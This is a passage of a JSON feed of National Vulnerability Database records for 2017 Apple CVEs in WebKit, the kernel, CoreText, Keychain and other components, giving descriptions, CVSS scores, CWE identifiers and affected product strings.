It allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2367", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2367"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:apple:safari:10.0.3", "cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2367", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2367", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:49:33", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"Keyboards\" component. 
A buffer overflow allows attackers to execute arbitrary code in a privileged context via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2458", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2458"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2458", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2458", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:49:24", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2454", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2454"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:tvos:10.1.1", "cpe:/a:apple:safari:10.0.3"], "id": "CVE-2017-2454", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2454", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:49:38", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2460", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2460"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/a:apple:safari:10.0.3", "cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2460", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2460", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:51:28", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. iCloud before 6.2 on Windows is affected. iTunes before 12.6 on Windows is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2479", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2479"], "modified": "2019-03-19T13:40:00", "cpe": [], "id": "CVE-2017-2479", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2479", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2022-03-23T15:48:44", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"CoreText\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted font file.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2435", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2435"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2435", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2435", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:52:03", "description": "Use after free vulnerability in the String.replace method JavaScriptCore in Apple Safari in iOS before 10.3 allows remote attackers to execute arbitrary code via a crafted web page, or a crafted file.", "cvss3": 
{"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-27T20:29:00", "type": "cve", "title": "CVE-2017-2491", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2491"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1"], "id": "CVE-2017-2491", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2491", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:49:52", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2466", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2466"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:tvos:10.1.1", "cpe:/a:apple:safari:10.0.3"], "id": "CVE-2017-2466", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2466", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:50:09", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"Kernel\" component. 
It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2473", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2473"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2473", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2473", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:51:31", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2481", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2481"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/a:apple:safari:10.0.3", "cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2481", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2481", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:52:04", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"JavaScriptCore\" component. 
It allows remote attackers to conduct Universal XSS (UXSS) attacks via a crafted web site that triggers prototype mishandling.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2018-04-03T06:29:00", "type": "cve", "title": "CVE-2017-2492", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2492"], "modified": "2019-03-08T16:06:00", "cpe": [], "id": "CVE-2017-2492", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2492", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2022-03-23T15:49:10", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. The issue involves the \"Keychain\" component. 
It allows man-in-the-middle attackers to bypass an iCloud Keychain secret protection mechanism by leveraging lack of authentication for OTR packets.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2448", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2448"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2448", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2448", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:49:43", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. 
The issue involves the \"Audio\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted audio file.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2462", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2462"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2462", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2462", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:50:01", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. 
The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2470", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2470"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/a:apple:safari:10.0.3", "cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2470", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2470", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:46:04", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves symlink mishandling in the \"libarchive\" component. 
It allows local users to change arbitrary directory permissions via unspecified vectors.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2390", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": 